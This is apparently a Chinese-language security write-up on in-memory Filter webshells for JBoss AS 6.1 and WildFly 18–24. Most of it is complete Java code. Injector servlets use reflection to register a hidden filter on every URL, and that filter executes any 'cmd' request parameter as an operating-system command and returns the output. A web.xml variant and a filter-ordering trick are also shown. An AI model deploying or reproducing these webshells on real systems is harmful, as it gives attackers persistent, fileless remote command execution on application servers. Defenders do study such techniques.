JBoss & WildFly Filter 内存马

缘起万户OA

JBoss AS v6.1.0.Final

import org.apache.catalina.Context;import org.apache.catalina.core.ApplicationContext;import org.apache.catalina.core.ApplicationFilterConfig;import org.apache.catalina.core.StandardContext;import org.apache.catalina.deploy.FilterDef;import org.apache.catalina.deploy.FilterMap;import javax.servlet.*;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.IOException;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationTargetException;import java.util.Map;
public class FilterInject6 extends HttpServlet {    static public class myfilter implements Filter {        @Override        public void init(FilterConfig filterConfig) throws ServletException {        }        @Override        public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {            String cmd;            if ((cmd = servletRequest.getParameter("cmd")) != null) {                Process process = Runtime.getRuntime().exec(cmd);                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(                        new java.io.InputStreamReader(process.getInputStream())                );                StringBuilder stringBuilder = new StringBuilder();                String line;                while ((line = bufferedReader.readLine()) != null) {                    stringBuilder.append(line + 'n');                }                servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());                servletResponse.getOutputStream().flush();                servletResponse.getOutputStream().close();                return;            }            filterChain.doFilter(servletRequest, servletResponse);        }        @Override        public void destroy() {
        }
    }
    @Override    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {        try {            final String name = "filterDemo";            ServletContext servletContext = req.getSession().getServletContext();            Field appctx = servletContext.getClass().getDeclaredField("context");            appctx.setAccessible(true);            ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);            Field stdctx = applicationContext.getClass().getDeclaredField("context");            stdctx.setAccessible(true);            StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);            Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");            Configs.setAccessible(true);            Map filterConfigs = (Map) Configs.get(standardContext);            Filter evilFilter = new myfilter();            FilterDef filterDef = new FilterDef();            filterDef.setFilterName(name);            filterDef.setFilterClass(evilFilter.getClass().getName());            standardContext.addFilterDef(filterDef);            FilterMap filterMap = new FilterMap();            filterMap.addURLPattern("/*");            filterMap.setFilterName(name);            filterMap.setDispatcher(DispatcherType.REQUEST.name());            standardContext.addFilterMapBefore(filterMap);            Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);            constructor.setAccessible(true);            ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);            filterConfigs.put(name, filterConfig);            resp.getWriter().write("inject success");        } catch (NoSuchFieldException | NoSuchMethodException | IllegalAccessException | InstantiationException | InvocationTargetException e) {            e.printStackTrace();        }    }}

WildFly，原名JBoss AS或者JBoss，是一套应用程序服务器，属于开源的企业级Java中间件软件，用于实现基于SOA架构的web应用和服务。

ServletContext servletContext = request.getServletContext();

package com.example.wildfly;import javax.servlet.*;import java.io.IOException;
public class FilterShell implements Filter {    @Override    public void init(FilterConfig filterConfig) throws ServletException {    }
    @Override    public void doFilter(ServletRequest req, ServletResponse resp, FilterChain filterChain) throws IOException, ServletException {        try {            String cmd;            if ((cmd = req.getParameter("cmd")) != null) {                Process process = Runtime.getRuntime().exec(cmd);                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));                StringBuilder stringBuilder = new StringBuilder();                String line;                while ((line = bufferedReader.readLine()) != null) {                    stringBuilder.append(line + 'n');                }                resp.getOutputStream().write(stringBuilder.toString().getBytes());                resp.getOutputStream().flush();                resp.getOutputStream().close();            }            filterChain.doFilter(req, resp);        }catch (Exception e){            filterChain.doFilter(req, resp);        }    }
    @Override    public void destroy() {    }}

<filter>    <filter-name>FilterShell</filter-name>    <filter-class>com.example.wildfly.FilterShell</filter-class></filter><filter-mapping>    <filter-name>FilterShell</filter-name>    <url-pattern>/index</url-pattern></filter-mapping>

WildFly v18.0.0.Final

https://www.tabnine.com/code/java/methods/io.undertow.servlet.api.DeploymentInfo/addFilter

ServletContext servletContext = request.getServletContext();

Filter evilFilter = new FilterShell();

FilterInfo filter = new FilterInfo(evilFilter.getClass().getName(),evilFilter.getClass());

Field deploymentInfoF = servletContext.getClass().getDeclaredField("deploymentInfo");deploymentInfoF.setAccessible(true);DeploymentInfo deploymentInfo = (DeploymentInfo)deploymentInfoF.get(servletContext);deploymentInfo.addFilter(filter);

Field deploymentF= servletContext.getClass().getDeclaredField("deployment");deploymentF.setAccessible(true);DeploymentImpl deployment = (DeploymentImpl) deploymentF.get(servletContext);deployment.getFilters().addFilter(filter);

deploymentInfo.addFilterUrlMapping(evilFilter.getClass().getName(), "/*",DispatcherType.REQUEST);

response.getWriter().write("inject success !!!");

package com.example.wildfly;
import io.undertow.servlet.api.DeploymentInfo;import io.undertow.servlet.api.FilterInfo;import io.undertow.servlet.core.DeploymentImpl;import javax.servlet.*;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.IOException;import java.lang.reflect.Field;
/** * Tested version: *      WildFly 18.0.0.Final *      Wildfly 20.0.1.Final *      WildFly 24.0.1.Final * */public class FilterInject extends HttpServlet {    public static class FilterShell implements Filter {        @Override        public void init(FilterConfig filterConfig) throws ServletException {        }
        @Override        public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
            String cmd;            if ((cmd = servletRequest.getParameter("cmd")) != null) {                Process process = Runtime.getRuntime().exec(cmd);                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(                        new java.io.InputStreamReader(process.getInputStream())                );                StringBuilder stringBuilder = new StringBuilder();                String line;                while ((line = bufferedReader.readLine()) != null) {                    stringBuilder.append(line + 'n');                }                servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());                servletResponse.getOutputStream().flush();                servletResponse.getOutputStream().close();            }            filterChain.doFilter(servletRequest, servletResponse);        }
        @Override        public void destroy() {
        }    }
    @Override    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {        try {            ServletContext servletContext = request.getServletContext();            Filter evilFilter = new FilterShell();            FilterInfo filterInfo = new FilterInfo(evilFilter.getClass().getName(), evilFilter.getClass());            Field  deploymentInfoF = servletContext.getClass().getDeclaredField("deploymentInfo");            deploymentInfoF.setAccessible(true);            DeploymentInfo deploymentInfo = (DeploymentInfo) deploymentInfoF.get(servletContext);            deploymentInfo.addFilter(filterInfo);            Field deploymentF= servletContext.getClass().getDeclaredField("deployment");            deploymentF.setAccessible(true);            DeploymentImpl deployment = (DeploymentImpl) deploymentF.get(servletContext);            deployment.getFilters().addFilter(filterInfo);            deploymentInfo.addFilterUrlMapping(evilFilter.getClass().getName(), "/*", DispatcherType.REQUEST);            response.getWriter().write("inject success !!!");        } catch (Exception e) {            e.printStackTrace();        }    }}

deploymentInfo.insertFilterUrlMapping(0,evilFilter.getClass().getName(),"/*",DispatcherType.REQUEST);